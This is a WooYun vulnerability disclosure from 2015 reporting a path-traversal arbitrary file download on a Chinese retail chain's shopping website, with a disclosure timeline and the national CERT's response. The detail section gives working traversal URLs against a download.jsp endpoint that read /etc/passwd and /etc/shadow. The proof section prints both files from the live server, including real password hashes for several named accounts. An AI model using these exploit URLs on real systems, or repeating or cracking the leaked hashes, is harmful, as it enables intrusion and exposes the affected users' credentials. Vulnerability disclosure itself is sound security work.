当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127123

漏洞标题:人人乐购物网任意文件下载

相关厂商:人人乐连锁商业集团股份有限公司

漏洞作者: sOnsec

提交时间:2015-07-16 23:55

修复时间:2015-09-06 00:00

公开时间:2015-09-06 00:00

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-16: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

人人乐购物网任意文件下载,可读取重要文件

详细说明:

http://csbh.com.cn/share/download.jsp?filePath=../../../../../../../etc/shadow&fileName=shadow
http://csbh.com.cn/share/download.jsp?filePath=../../../../../../../etc/passwd&fileName=passwd

漏洞证明:

rr.png


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
xh:x:1002:1002:xiaohong,,,:/home/xh:/bin/bash
colord:x:105:113:colord colour management daemon,,,:/var/lib/colord:/bin/false
wangping:x:1001:1001:,,,:/home/wangping:/bin/bash
jboss:x:1000:1000:,,,:/home/jboss:/bin/bash
ntp:x:106:114::/home/ntp:/bin/false


root:!:16464:0:99999:7:::
daemon:*:16176:0:99999:7:::
bin:*:16176:0:99999:7:::
sys:*:16176:0:99999:7:::
sync:*:16176:0:99999:7:::
games:*:16176:0:99999:7:::
man:*:16176:0:99999:7:::
lp:*:16176:0:99999:7:::
mail:*:16176:0:99999:7:::
news:*:16176:0:99999:7:::
uucp:*:16176:0:99999:7:::
proxy:*:16176:0:99999:7:::
www-data:*:16176:0:99999:7:::
backup:*:16176:0:99999:7:::
list:*:16176:0:99999:7:::
irc:*:16176:0:99999:7:::
gnats:*:16176:0:99999:7:::
nobody:*:16176:0:99999:7:::
libuuid:!:16176:0:99999:7:::
syslog:*:16176:0:99999:7:::
messagebus:*:16464:0:99999:7:::
landscape:*:16464:0:99999:7:::
sshd:*:16464:0:99999:7:::
xh:$6$1vg3/Hn5$GiSlk8OqQPvpGN.4DXBbhPcAy/N7EWflc8et0rTE/cS0Tuwc0FYbAGhOvVovtMeJMwFYD5Ed7EfkIATIfuIw50:16464:0:99999:7:::
colord:*:16464:0:99999:7:::
wangping:$6$rvCPCObD$ERSB68YBGIxNJx94LANnU0vKl2WZt6vq9uO6ydYQq//TlJtOftxSnd90.f0OAsiisqRY8AVAh3.jJDm.jk2250:16471:0:99999:7:::
jboss:$6$0aCw2yCQ$TCtMmDJAk6GNRzfSV2/WHKDDzGJ9YLNf55H.Sr3EXvYELwmvD92HhPRh2z9/CqP4mIKAKVdK9zTpYrAwW0AVw.:16470:0:99999:7:::
ntp:*:16615:0:99999:7:::

修复方案:

控制权限

版权声明:转载请注明来源 sOnsec@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-20 17:32

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评论